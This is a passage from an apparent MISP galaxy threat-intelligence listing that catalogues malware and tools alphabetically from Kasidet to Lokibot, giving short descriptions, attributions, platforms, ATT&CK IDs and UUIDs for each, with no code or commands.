software_attack_id | S0215 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kasidet
Kasidet is a backdoor that has been dropped by using malicious VBA macros. [Zscaler Kasidet]
Internal MISP references
UUID 1896b9c9-a93e-4220-b4c2-6c4c9c5ca297
which can be used as unique global reference for Kasidet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0088 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Kazuar
Kazuar is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. [Unit 42 Kazuar May 2017]
Internal MISP references
UUID e93990a0-4841-4867-8b74-ac2806d787bf
which can be used as unique global reference for Kazuar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0265 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kerrdown
Kerrdown is a custom downloader that has been used by APT32 since at least 2018 to install spyware from a server on the victim's network.[Amnesty Intl. Ocean Lotus February 2021][Unit 42 KerrDown February 2019]
Internal MISP references
UUID 17c28e46-1005-4737-8567-d4ad9f1aefd1
which can be used as unique global reference for Kerrdown
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0585 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kessel
Kessel is an advanced version of OpenSSH that acts as a custom backdoor, mainly used to steal credentials and to function as a bot. Kessel has been active since its C2 domain began resolving in August 2018.[ESET ForSSHe December 2018]
Internal MISP references
UUID 32f1e0d3-753f-4b51-aec5-cfaa393cedc3
which can be used as unique global reference for Kessel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0487 |
source | MITRE |
type | ['malware'] |
Kevin
Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.[Kaspersky Lyceum October 2021]
Internal MISP references
UUID b9730d7c-aa57-4d6f-9125-57dcb65b02e0
which can be used as unique global reference for Kevin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1020 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KeyBoy
KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[CitizenLab KeyBoy Nov 2016][PWC KeyBoys Feb 2017]
Internal MISP references
UUID 6ec39371-d50b-43b6-937c-52de00491eab
which can be used as unique global reference for KeyBoy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0387 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Keydnap
Keydnap is malware that steals the content of the user's keychain while maintaining a permanent backdoor.[OSX Keydnap malware]
Internal MISP references
UUID aefbe6ff-7ce4-479e-916d-e8f0259d81f6
which can be used as unique global reference for Keydnap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0276 |
source | MITRE |
type | ['malware'] |
KEYMARBLE
KEYMARBLE is a Trojan that has reportedly been used by the North Korean government. [US-CERT KEYMARBLE Aug 2018]
Internal MISP references
UUID a644f61e-6a9b-41ab-beca-72518351c27f
which can be used as unique global reference for KEYMARBLE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0271 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KEYPLUG
KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.[Mandiant APT41]
Internal MISP references
UUID ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a
which can be used as unique global reference for KEYPLUG
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S1051 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KGH_SPY
KGH_SPY is a modular suite of tools used by Kimsuky for reconnaissance, information stealing, and backdoor capabilities. KGH_SPY derived its name from PDB paths and internal names found in samples containing "KGH".[Cybereason Kimsuky November 2020]
Internal MISP references
UUID c1e1ab6a-d5ce-4520-98c5-c6df41005fd9
which can be used as unique global reference for KGH_SPY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0526 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KillDisk
KillDisk is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of BlackEnergy malware during cyber attacks against Ukraine in 2015. KillDisk has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some KillDisk variants.[KillDisk Ransomware][ESEST Black Energy Jan 2016][Trend Micro KillDisk 1][Trend Micro KillDisk 2]
Internal MISP references
UUID b5532e91-d267-4819-a05d-8c5358995add
which can be used as unique global reference for KillDisk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0607 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kinsing
Kinsing is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. [Aqua Kinsing April 2020][Sysdig Kinsing November 2020][Aqua Security Cloud Native Threat Report June 2021]
Internal MISP references
UUID 7b4f157c-4b34-4f55-9c20-ff787495e9ba
which can be used as unique global reference for Kinsing
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Containers'] |
software_attack_id | S0599 |
source | MITRE |
tags | ['efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
type | ['malware'] |
Kivars
Kivars is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by BlackTech in a 2010 campaign.[TrendMicro BlackTech June 2017]
Internal MISP references
UUID 673ed346-9562-4997-80b2-e701b1a99a58
which can be used as unique global reference for Kivars
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0437 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Koadic
Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[Github Koadic][Palo Alto Sofacy 06-2018][MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd
which can be used as unique global reference for Koadic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0250 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Kobalos
Kobalos is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. Kobalos has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. Kobalos was first identified in late 2019.[ESET Kobalos Feb 2021][ESET Kobalos Jan 2021]
Internal MISP references
UUID bf918663-90bd-489e-91e7-6951a18a25fd
which can be used as unique global reference for Kobalos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0641 |
source | MITRE |
type | ['malware'] |
KOCTOPUS
KOCTOPUS's batch variant is a loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant that has the same functionality as the batch version.[MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 3e13d07d-d9e1-4456-bec3-b2375e404753
which can be used as unique global reference for KOCTOPUS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0669 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Komplex
Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX [XAgentOSX 2017] [Sofacy Komplex Trojan].
Internal MISP references
UUID 2cf1be0d-2fba-4fd0-ab2f-3695716d1735
which can be used as unique global reference for Komplex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0162 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KOMPROGO
KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management. [FireEye APT32 May 2017]
Internal MISP references
UUID 3067f148-2e2b-4aac-9652-59823b3ad4f1
which can be used as unique global reference for KOMPROGO
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0156 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KONNI
KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.[Talos Konni May 2017][Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018][Medium KONNI Jan 2020][Malwarebytes Konni Aug 2021]
Internal MISP references
UUID d381de2a-30cb-4d50-bbce-fd1e489c4889
which can be used as unique global reference for KONNI
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0356 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
KOPILUWAK
KOPILUWAK is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID d09c4459-1aa3-547d-99f4-7ac73b8043f0
which can be used as unique global reference for KOPILUWAK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1075 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kwampirs
Kwampirs is a backdoor Trojan used by Orangeworm. Kwampirs has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines.[Symantec Orangeworm April 2018] Kwampirs has multiple technical overlaps with Shamoon based on reverse engineering analysis.[Cylera Kwampirs 2022]
Internal MISP references
UUID 35ac4018-8506-4025-a9e3-bd017700b3b3
which can be used as unique global reference for Kwampirs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0236 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Launch-VsDevShell
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet
Author: Nasreddine Bencherchali
Paths:
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1
Resources:
* https://twitter.com/nas_bench/status/1535981653239255040
Detection:
* Sigma: proc_creation_win_lolbin_launch_vsdevshell.yml[Launch-VsDevShell.ps1 - LOLBAS Project]
Internal MISP references
UUID 288b2ab2-255a-457a-a6eb-02ee4711d6b8
which can be used as unique global reference for Launch-VsDevShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5258 |
source | Tidal Cyber |
tags | ['5be0da70-9249-44fa-8c3b-7394ef26b2e0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
LaZagne
LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[GitHub LaZagne Dec 2018]
Internal MISP references
UUID f5558af4-e3e2-47c2-b8fe-72850bd30f37
which can be used as unique global reference for LaZagne
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0349 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '26c5dec7-3184-4873-ae20-9558a498a27f', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ldifde
Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to "extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services".[Ldifde Microsoft]
Internal MISP references
UUID d0ff555f-ba74-457c-b6e4-02962c230b60
which can be used as unique global reference for Ldifde
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5017 |
source | Tidal Cyber |
tags | ['cea43301-9f7a-46a5-be3a-3a09f0f3c09e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LEMURLOOT
LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.[Mandiant MOVEit Transfer June 2 2023]
Related Vulnerabilities: CVE-2023-34362[U.S. CISA CL0P CVE-2023-34362 Exploitation][Mandiant MOVEit Transfer June 2 2023]
Internal MISP references
UUID d5d79a51-3756-40de-81cd-4dac172fbb74
which can be used as unique global reference for LEMURLOOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5020 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '173e1480-8d9b-49c5-854d-594dde9740d6', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Level
According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID bce485ad-7d4f-45b6-b3c1-218f2f757611
which can be used as unique global reference for Level
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5067 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LightNeuron
LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of LightNeuron exists.[ESET LightNeuron May 2019]
Internal MISP references
UUID c9d2f023-d54b-4d08-9598-a42fb92b3161
which can be used as unique global reference for LightNeuron
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0395 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LIGHTWIRE
LIGHTWIRE is a web shell written in Perl that was used during Cutting Edge to maintain access and enable command execution by embedding itself into the legitimate compcheckresult.cgi component of Ivanti Secure Connect VPNs.[Mandiant Cutting Edge Part 2 January 2024][Mandiant Cutting Edge January 2024]
Internal MISP references
UUID 1b3af76f-f9a1-58ce-8c7d-aec535f8d0c0
which can be used as unique global reference for LIGHTWIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1119 |
source | MITRE |
type | ['malware'] |
Ligolo
Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 3113cb05-23b4-4f90-ab7a-623b800302ce
which can be used as unique global reference for Ligolo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5034 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Line Dancer
Line Dancer is one of the two key tools used during the ArcaneDoor network device intrusions, serving as an in-memory implant used to upload capabilities that permit arbitrary code execution and persistence (the latter provided by Line Runner).[Cisco Talos ArcaneDoor April 24 2024]
Internal MISP references
UUID 80412b83-74e4-4bea-b05b-84b00f41db69
which can be used as unique global reference for Line Dancer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Network'] |
software_attack_id | S5284 |
source | Tidal Cyber |
tags | ['a159c91c-5258-49ea-af7d-e803008d97d3', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', '6bb2f579-a5cd-4647-9dcd-eff05efe3679', '9768aada-9d63-4d46-ab9f-d41b8c8e4010', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3'] |
type | ['malware'] |
Line Runner
Line Runner is one of the two key tools (along with Line Dancer) used during the ArcaneDoor network device intrusion. Line Runner is used to maintain persistence and execute commands on compromised devices.[Cisco Talos ArcaneDoor April 24 2024]
Internal MISP references
UUID 60bb6282-9eb8-4640-9d79-69c0c8ee0e0b
which can be used as unique global reference for Line Runner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Network'] |
software_attack_id | S5285 |
source | Tidal Cyber |
tags | ['a159c91c-5258-49ea-af7d-e803008d97d3', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', 'c25f341a-7030-4688-a00b-6d637298e52e', '9768aada-9d63-4d46-ab9f-d41b8c8e4010', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', '2e85babc-77cd-4455-9c6e-312223a956de'] |
type | ['malware'] |
Linfo
Linfo is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Linfo May 2012]
Internal MISP references
UUID 925975f8-e8ff-411f-a40e-f799968046f7
which can be used as unique global reference for Linfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0211 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Linux Rabbit
Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[Anomali Linux Rabbit 2018]
Internal MISP references
UUID d017e133-fce9-4982-a2df-6867a80089e7
which can be used as unique global reference for Linux Rabbit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0362 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', '70dc52b0-f317-4134-8a42-71aea1443707'] |
type | ['malware'] |
LiteDuke
LiteDuke is a third stage backdoor that was used by APT29, primarily in 2014-2015. LiteDuke used the same dropper as PolyglotDuke, and was found on machines also compromised by MiniDuke.[ESET Dukes October 2019]
Internal MISP references
UUID 71e4028c-9ca1-45ce-bc44-98209ae9f6bd
which can be used as unique global reference for LiteDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0513 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LitePower
LitePower is a downloader and second stage malware that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]
Internal MISP references
UUID cc568409-71ff-468b-9c38-d0dd9020e409
which can be used as unique global reference for LitePower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0680 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LITTLELAMB.WOOLTEA
LITTLELAMB.WOOLTEA is a backdoor that was used by UNC5325 during Cutting Edge to deploy malware on targeted Ivanti Connect Secure VPNs and to establish persistence across system upgrades and patches.[Mandiant Cutting Edge Part 3 February 2024]
Internal MISP references
UUID c9c5e7ad-6e95-5d53-b4db-f6b51c7167ca
which can be used as unique global reference for LITTLELAMB.WOOLTEA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1121 |
source | MITRE |
type | ['malware'] |
Lizar
Lizar is a modular remote access tool written using the .NET Framework that shares structural similarities to Carbanak. It has likely been used by FIN7 since at least February 2021.[BiZone Lizar May 2021][Threatpost Lizar May 2021][Gemini FIN7 Oct 2021]
Internal MISP references
UUID 65d46aab-b3ce-4f5b-b1fc-871db2573fa1
which can be used as unique global reference for Lizar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0681 |
source | MITRE |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LockBit 3.0
Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.[U.S. CISA Understanding LockBit June 2023]
LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[U.S. CISA Understanding LockBit June 2023] According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive” than previous LockBit strains.[U.S. CISA LockBit 3.0 March 2023]
According to data collected by the ransomwatch project and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).[GitHub ransomwatch]
Delivered By: Cobalt Strike[Sentinel Labs LockBit 3.0 July 2022], PsExec[NCC Group Research Blog August 19 2022]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/lockbit/
PulseDive (IOCs): https://pulsedive.com/threat/LockBit
Internal MISP references
UUID 08c70ea5-9d4d-4146-826e-c5ebd5490378
which can be used as unique global reference for LockBit 3.0
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5047 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '5e7433ad-a894-4489-93bc-41e90da90019', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LockerGoga
LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[Unit42 LockerGoga 2019][CarbonBlack LockerGoga 2019]
Internal MISP references
UUID 65bc8e81-0a08-49f6-9d04-a2d63d512342
which can be used as unique global reference for LockerGoga
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0372 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LoFiSe
LoFiSe has been used by ToddyCat since at least 2023 to identify and collect files of interest on targeted systems.[Kaspersky ToddyCat Check Logs October 2023]
Internal MISP references
UUID d28c3706-df25-59e2-939f-131abaf8a1eb
which can be used as unique global reference for LoFiSe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1101 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LogMeIn
LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.[LogMeIn Homepage] Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.[CISA Royal AA23-061A March 2023][CSRB LAPSUS$ July 24 2023]
Internal MISP references
UUID 7b471178-30a1-4c48-bbff-c4d2fdbb35a9
which can be used as unique global reference for LogMeIn
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5073 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LoJax
LoJax is a UEFI rootkit used by APT28 to persist remote access software on targeted systems.[ESET LoJax Sept 2018]
Internal MISP references
UUID 039f34e9-f379-4a24-a53f-b28ba579854c
which can be used as unique global reference for LoJax
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0397 |
source | MITRE |
tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lokibot
Lokibot is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. Lokibot can also create a backdoor into infected systems to allow an attacker to install additional payloads.[Infoblox Lokibot January 2019][Morphisec Lokibot April 2020][CISA Lokibot September 2020]
Internal MISP references
